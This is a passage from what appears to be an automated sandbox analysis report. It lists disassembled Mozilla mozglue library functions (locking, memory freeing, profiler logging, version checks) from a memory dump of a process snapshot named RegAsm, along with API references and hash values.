                                                                                                                                                                                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C72CC83,?,?,?,?,?,?,?,?,?,6C72BCAE,?,?,6C71DC2C), ref: 6C6EB896
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 922945588-0
                                                                                                                                                                                                                                                    • Opcode ID: 836ea152fac2250a8ba616c5fb4dd53827cbd3bab0352e05794f4d21d5770c6f
                                                                                                                                                                                                                                                    • Instruction ID: 8280fdd2c0d23fea7e1079668ebdb5a04e2c550469aceaca9ddb4831e166f538
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 836ea152fac2250a8ba616c5fb4dd53827cbd3bab0352e05794f4d21d5770c6f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 595167357057048FDB25CF59C484A7ABBF5FF8D318B69856AE98A87351CB30E801CB88
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C721D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C721D0F
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,6C721BE3,?,?,6C721D96,00000000), ref: 6C721D18
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,6C721BE3,?,?,6C721D96,00000000), ref: 6C721D4C
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C721DB7
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C721DC0
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C721DDA
                                                                                                                                                                                                                                                      • Part of subcall function 6C721EF0: GetCurrentThreadId.KERNEL32 ref: 6C721F03
                                                                                                                                                                                                                                                      • Part of subcall function 6C721EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C721DF2,00000000,00000000), ref: 6C721F0C
                                                                                                                                                                                                                                                      • Part of subcall function 6C721EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C721F20
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C721DF4
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1880959753-0
                                                                                                                                                                                                                                                    • Opcode ID: 13e3614c0d45c7f81479f1c937ae74c4874539a5d91a833f68e5540bddda9b9c
                                                                                                                                                                                                                                                    • Instruction ID: d558848ec4f857b42736eddfb2e34ab77ee4c44b11627410877dabcff13999e5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13e3614c0d45c7f81479f1c937ae74c4874539a5d91a833f68e5540bddda9b9c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 434188B56007049FCB10CF29C589A66BBF9FF89314F50442EE99A87B41CB35F854CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E38A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75E220,?,?,?,?,6C6E3899,?), ref: 6C6E38B2
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75E220,?,?,?,6C6E3899,?), ref: 6C6E38C3
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,6C6E3899,?), ref: 6C6E38F1
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6E3920
                                                                                                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C6E3899,?), ref: 6C6E392F
                                                                                                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C6E3899,?), ref: 6C6E3943
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6C6E396E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3047341122-0
                                                                                                                                                                                                                                                    • Opcode ID: 0ff3b9f3623ab0ab798e6eb4d0a52452b9e66ad38de6f378cd6d05ec48df9e28
                                                                                                                                                                                                                                                    • Instruction ID: 15b1db0d960006a3943d395cdebed31d5b952a2c297d653d5194c57c32398a78
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ff3b9f3623ab0ab798e6eb4d0a52452b9e66ad38de6f378cd6d05ec48df9e28
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54215272601710DFD720DF15C884B96B7B9EF48328F25803AD85A97B20D731F845CB94
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C7184E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7184F3
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C71850A
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C71851E
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C71855B
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C71856F
                                                                                                                                                                                                                                                    • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7185AC
                                                                                                                                                                                                                                                      • Part of subcall function 6C717670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C71767F
                                                                                                                                                                                                                                                      • Part of subcall function 6C717670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C717693
                                                                                                                                                                                                                                                      • Part of subcall function 6C717670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7176A7
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7185B2
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6F5EDB
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: memset.VCRUNTIME140(ewsl,000000E5,?), ref: 6C6F5F27
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6F5FB2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2666944752-0
                                                                                                                                                                                                                                                    • Opcode ID: d234fb5924dd097c740330ffb8b384822012a3a0f2dda40647277bfb18ae0bee
                                                                                                                                                                                                                                                    • Instruction ID: a91a87331424a4899109b673e687abe2e5c84e70449386408e3b654fbf608133
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d234fb5924dd097c740330ffb8b384822012a3a0f2dda40647277bfb18ae0bee
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 382189742046018FDB14DF29C988A6AB7B5EF8430DF29483DE59B87B41EF31E948CB55
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E1640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C6E1699
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E16CB
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E16D7
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E16DE
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E16E5
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E16EC
                                                                                                                                                                                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6E16F9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 375572348-0
                                                                                                                                                                                                                                                    • Opcode ID: 126ce094f6a1ad1693054b9d3633170f1bf38e946b7d838d29b5c4d4f4a1275e
                                                                                                                                                                                                                                                    • Instruction ID: d27f0751acb8ca2f18f0321bbe22ddbd6d0a1f02751b7252faf12e506f492999
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 126ce094f6a1ad1693054b9d3633170f1bf38e946b7d838d29b5c4d4f4a1275e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E521D5B07442086FEB106B64CC49FBBB37CEF86714F808529F6459B1C1CA789D548BA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C71DE60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71DE73
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C74FEF3,?,?,?,?,?,?,00000000), ref: 6C71DE7B
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: GetCurrentProcess.KERNEL32(?,6C6D31A7), ref: 6C70CBF1
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6D31A7), ref: 6C70CBFA
                                                                                                                                                                                                                                                    • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000), ref: 6C71DEB8
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C71DEFE
                                                                                                                                                                                                                                                    • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C71DF38
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [I %d/%d] locked_profiler_stop, xrefs: 6C71DE83
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getenv$CurrentProcessThread$BufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                                                    • String ID: [I %d/%d] locked_profiler_stop
                                                                                                                                                                                                                                                    • API String ID: 3136165603-3405337583
                                                                                                                                                                                                                                                    • Opcode ID: 867c85690f9b1e9802c16dced07639ca6f9b4e28469491ab25519f4ba100f8d7
                                                                                                                                                                                                                                                    • Instruction ID: 6ee60c28c245acea7c3e8a327197af63f27632b03df4460ee84999982d1b2516
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 867c85690f9b1e9802c16dced07639ca6f9b4e28469491ab25519f4ba100f8d7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39216D317051004BDB149B25C90C79A7B79EB5230CF9C0036D929C7F41CF34A80ACBD5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C72D1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D1EC
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D1F5
                                                                                                                                                                                                                                                      • Part of subcall function 6C72AD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6C72AE20
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D211
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D217
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D226
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D279
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C72D2B2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3049780610-0
                                                                                                                                                                                                                                                    • Opcode ID: e8c7b5141db71f98699ea407fd2d8a245132e6785d6729dd811b4c84cd8cd851
                                                                                                                                                                                                                                                    • Instruction ID: 52213126b557dd84d562dacfe743895c6e8dda0c06a2170c338bda0be114ed47
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8c7b5141db71f98699ea407fd2d8a245132e6785d6729dd811b4c84cd8cd851
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58217C71704305DBCB05DF64C488AAEB7B5FF8A324F50462EE51A87340DB34A90ACB9A
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C71F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: GetCurrentProcess.KERNEL32(?,6C6D31A7), ref: 6C70CBF1
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6D31A7), ref: 6C70CBFA
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F619
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C71F598), ref: 6C71F621
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F637
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8,?,?,00000000,?,6C71F598), ref: 6C71F645
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8,?,?,00000000,?,6C71F598), ref: 6C71F663
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C71F62A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                    • API String ID: 1579816589-753366533
                                                                                                                                                                                                                                                    • Opcode ID: 06b93a91db8b751b815252b5bac399c89bb0a94a3005eebf407987f02fe898a0
                                                                                                                                                                                                                                                    • Instruction ID: c8f183edcc7a47b68df59a3111b7d53297c2ca94587914078cf713c9f18b0913
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06b93a91db8b751b815252b5bac399c89bb0a94a3005eebf407987f02fe898a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74119475305204ABCB44AF69D64C9A6777DFB8636CB940026EA1583F41CF71A821CBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E2070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(combase.dll,6C6E1C5F), ref: 6C6E20AE
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C6E20CD
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E20E1
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C6E2124
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                                                    • String ID: CoInitializeSecurity$combase.dll
                                                                                                                                                                                                                                                    • API String ID: 4190559335-2476802802
